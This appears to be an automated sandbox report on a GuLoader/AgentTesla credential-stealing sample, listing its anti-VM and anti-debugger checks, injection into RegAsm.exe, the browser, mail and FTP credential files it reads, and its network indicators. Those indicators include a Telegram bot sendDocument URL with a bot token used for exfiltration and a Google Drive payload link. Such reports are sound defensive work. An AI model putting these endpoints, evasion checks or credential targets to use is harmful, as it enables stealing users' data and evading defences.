            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000002.1068476517.0000000002200000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000002.1068476517.0000000002200000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeRDTSC instruction interceptor: First address: 00000000021E7A55 second address: 00000000021E7A55 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, D92A24AEh 0x00000013 add eax, 4EEBA808h 0x00000018 xor eax, 38B3CD47h 0x0000001d xor eax, 10A601F0h 0x00000022 jmp 00007F25712624E2h 0x00000024 cmp dx, cx 0x00000027 cpuid 0x00000029 bt ecx, 1Fh 0x0000002d jc 00007F2571266199h 0x00000033 cmp ecx, edx 0x00000035 popad 0x00000036 call 00007F2571262524h 0x0000003b lfence 0x0000003e rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000D87A55 second address: 0000000000D87A55 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, D92A24AEh 0x00000013 add eax, 4EEBA808h 0x00000018 xor eax, 38B3CD47h 0x0000001d xor eax, 10A601F0h 0x00000022 jmp 00007F257125D2B2h 0x00000024 cmp dx, cx 0x00000027 cpuid 0x00000029 bt ecx, 1Fh 0x0000002d jc 00007F2571260F69h 0x00000033 cmp ecx, edx 0x00000035 popad 0x00000036 call 00007F257125D2F4h 0x0000003b lfence 0x0000003e rdtsc
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1504Thread sleep time: -11068046444225724s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9682Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeSystem information queried: ModuleInformationJump to behavior
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000002.1068476517.0000000002200000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: CI and PL of CMZBD-210090.exe, 00000000.00000002.1068476517.0000000002200000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_1D6A0A66 KiUserExceptionDispatcher,KiUserExceptionDispatcher,LdrInitializeThunk,KiUserExceptionDispatcher,15_2_1D6A0A66
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D80000Jump to behavior
            Source: C:\Users\user\Desktop\CI and PL of CMZBD-210090.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\CI and PL of CMZBD-210090.exe' Jump to behavior
            Source: RegAsm.exe, 0000000F.00000002.1738321830.00000000015B0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 0000000F.00000002.1738321830.00000000015B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000000F.00000002.1738321830.00000000015B0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 0000000F.00000002.1738321830.00000000015B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected Telegram RATShow sources
            Source: Yara matchFile source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6836, type: MEMORYSTR
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6836, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: Yara matchFile source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6836, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected Telegram RATShow sources
            Source: Yara matchFile source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6836, type: MEMORYSTR
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6836, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery521Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Input Capture111Process Discovery2Remote Desktop ProtocolInput Capture111Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery214VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CI and PL of CMZBD-210090.exe12%ReversingLabs
            CI and PL of CMZBD-210090.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.0.CI and PL of CMZBD-210090.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
            0.2.CI and PL of CMZBD-210090.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://gxOGQX5zujpp76F.com0%Avira URL Cloudsafe
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            https://api.telegram.org40%URL Reputationsafe
            http://ykBzBB.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		172.217.168.78
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high
                googlehosted.l.googleusercontent.com
                		172.217.168.65
                		truefalse
                  		high
                  doc-0o-00-docs.googleusercontent.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://doc-0o-00-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/4l47miito3jg5v0470e1itperpsq7fa1/1631637675000/05708870864161384939/*/1qQZmIPt4CPpFhu8--rYlatI9gfXk2XyS?e=downloadfalse
                      		high
                      https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocumentfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://gxOGQX5zujpp76F.comRegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmp, RegAsm.exe, 0000000F.00000003.1415072188.000000001CAC1000.00000004.00000001.sdmp, RegAsm.exe, 0000000F.00000002.1741992038.000000001DF0B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://DynDns.comDynDNSRegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://api.telegram.org/bot1996953049:AAH2EyLl5sWiWWep1n_p6ZBPPY3UEsTqo0M/sendDocumentdocument-----RegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpfalse
                          		high
                          https://api.telegram.org4RegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.orgRegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpfalse
                            		high
                            http://api.telegram.orgRegAsm.exe, 0000000F.00000002.1742119107.000000001DF5F000.00000004.00000001.sdmpfalse
                              		high
                              http://ykBzBB.comRegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 0000000F.00000002.1741642381.000000001DC01000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 0000000F.00000002.1742071913.000000001DF4B000.00000004.00000001.sdmpfalse
                                		high

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                172.217.168.78
                                		drive.google.comUnited States
                                		15169GOOGLEUSfalse
                                149.154.167.220
                                		api.telegram.orgUnited Kingdom
                                		62041TELEGRAMRUfalse
                                172.217.168.65
                                		googlehosted.l.googleusercontent.comUnited States
                                		15169GOOGLEUSfalse

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:483265
                                Start date:14.09.2021
                                Start time:18:36:06
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 13m 3s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:CI and PL of CMZBD-210090.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Run name:Suspected Instruction Hammering Hide Perf
                                Number of analysed new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@4/1@3/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 65.9% (good quality ratio 31.2%)
                                • Quality average: 26.6%
                                • Quality standard deviation: 33.9%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 59
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183, 40.126.31.139, 20.190.159.132, 40.126.31.141, 40.126.31.1, 20.190.159.136, 40.126.31.4, 20.190.159.138, 40.126.31.137, 20.82.210.154
                                • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                18:41:30API Interceptor1679x Sleep call for process: RegAsm.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                149.154.167.220SecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                  DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                    biNmoafSHb.exeGet hashmaliciousBrowse
                                      QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                        4y3aqXJURf.apkGet hashmaliciousBrowse
                                          UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                            VzqyxdLij2.exeGet hashmaliciousBrowse
                                              PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                  4XIWeWhn85.exeGet hashmaliciousBrowse
                                                    E9Vl6Ve253.exeGet hashmaliciousBrowse
                                                      payment.exeGet hashmaliciousBrowse
                                                        doc_306_01.exeGet hashmaliciousBrowse
                                                          FYI- Invoice Inquiry.exeGet hashmaliciousBrowse
                                                            Docs.exeGet hashmaliciousBrowse
                                                              PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                Dhl shipment.exeGet hashmaliciousBrowse
                                                                  P.O# 21-1477.exeGet hashmaliciousBrowse
                                                                    zHKzt27UuL.exeGet hashmaliciousBrowse
                                                                      Dhl Shipment.exeGet hashmaliciousBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        api.telegram.orgSecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        tNh3d45aXt.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        biNmoafSHb.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        VzqyxdLij2.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        1uHjqG0dPw.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        4XIWeWhn85.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        E9Vl6Ve253.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        doc_306_01.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        FYI- Invoice Inquiry.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Docs.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Dhl shipment.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        P.O# 21-1477.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        zHKzt27UuL.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220

                                                                        ASN

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        TELEGRAMRUSecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        DHL Cargo Arrival.xlsxGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Terw9bPuiD.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        biNmoafSHb.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        4y3aqXJURf.apkGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        VzqyxdLij2.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        zfl3hUTQWN.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        PUcvjsKtXq.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SeptemberOrderlist.pdf.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        SxvDkdIwWW.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        4XIWeWhn85.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        E9Vl6Ve253.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        payment.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        doc_306_01.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        WAa7VvnEeQ.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.99
                                                                        FYI- Invoice Inquiry.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Docs.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.W32.AIDetect.malware1.13106.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        setup_x86_x64_install.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Halkbank_Ekstre_20200521_082357_541079.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        Z9GkJvygEk.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        RZAcKBlQo0.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        F1MwWrwBR7.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        biNmoafSHb.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        kecFPnbu5K.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        QUOTATION REQUEST REF#E6448.2.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        5PfBAmWq3V.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        ac1khvFT2V.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        UK COVID UPDATES AND ENTITLEMENT.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
                                                                        New_Order_PO#96072380_MT_Quote.exeGet hashmaliciousBrowse
                                                                        • 149.154.167.220
